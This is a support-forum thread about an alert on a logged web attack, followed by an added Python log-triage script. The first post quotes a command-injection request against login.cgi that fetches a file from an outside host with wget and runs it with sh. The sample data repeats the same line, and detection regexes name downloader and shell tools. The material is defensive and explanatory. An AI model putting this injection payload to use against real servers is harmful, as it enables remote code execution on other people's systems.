A web attack returned code 200 (success).

  • A web attack returned code 200 (success).

    Hi there,

    I've seen a couple of these in IM logs:

    Code:
    A web attack returned code 200 (success).
    
    6
    
    block
    
    79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"
    What does it mean when it says: A web attack returned code 200 (success)?

    thx
    G

  • #2
    Hello! This rule doesn't work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
    Thank you!

    • #3
      IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

      More info: https://www.exploit-db.com/exploits/44760/

      • #4
        Hello! This particular request doesn't trigger a blocking rule, though it is being spotted by 3 generic rules from i360_1_generic.conf. Please take into consideration that in order to be blocked, a request pattern should be present in strict rule sets (blocking rules), but it doesn't, based on the 200 response. You can try to activate Proactive Defense (and turn Kill mode on), whose logic is based on an advanced heuristic mechanism and not on pattern matching. With this mode enabled, the aforementioned request will be 100% blocked (checked!).

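A triage sketch for access-log lines like the one in the first post, added here as an example and not part of the thread or of the product's rule set: it URL-decodes the query string, flags shell-command patterns, and lists the file paths and URLs to check on the host, as #3 suggests. The regexes, function names and sample lines (documentation address ranges) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Prefix of the Apache "combined" log format: client, time, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Heuristic (assumption): a shell separator directly followed by a downloader or shell.
CMD_RE = re.compile(r"[;|&`]\s*(?:wget|curl|tftp|sh|bash)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\";]+", re.I)
# Paths under world-writable directories, where such a request would try to drop a file.
PATH_RE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/[\w.\-]+")

def triage(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote(m["target"].partition("?")[2])  # decode %20, %27, %3E ...
    if not CMD_RE.search(query):
        return None
    return {
        "client": m["ip"],
        "time": m["ts"],
        "status": int(m["status"]),
        "decoded_query": query,
        "remote_urls": sorted(set(URL_RE.findall(query))),
        "local_paths": sorted(set(PATH_RE.findall(query))),
        # A 2xx status only says a page was served, not that the command ran,
        # so the listed paths still have to be checked on the host.
        "check_host": m["status"].startswith("2"),
    }

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f]

# Constructed sample lines, same shape as the entry quoted in the thread.
SAMPLE = [
    '192.0.2.10 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.7/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World"',
    '192.0.2.11 - - [29/Jun/2018:19:46:03 -0600] "GET /login.cgi?user=bob HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [29/Jun/2018:19:47:10 -0600] "GET /login.cgi?cli=aa%27;wget%20http://198.51.100.7/r%20-O%20/tmp/r%27 HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["client"], f["status"], f["local_paths"], f["remote_urls"], f["check_host"])
```

Findings with `check_host` set are the ones where the request was not rejected, so the listed paths and any related processes on the server are the next thing to inspect.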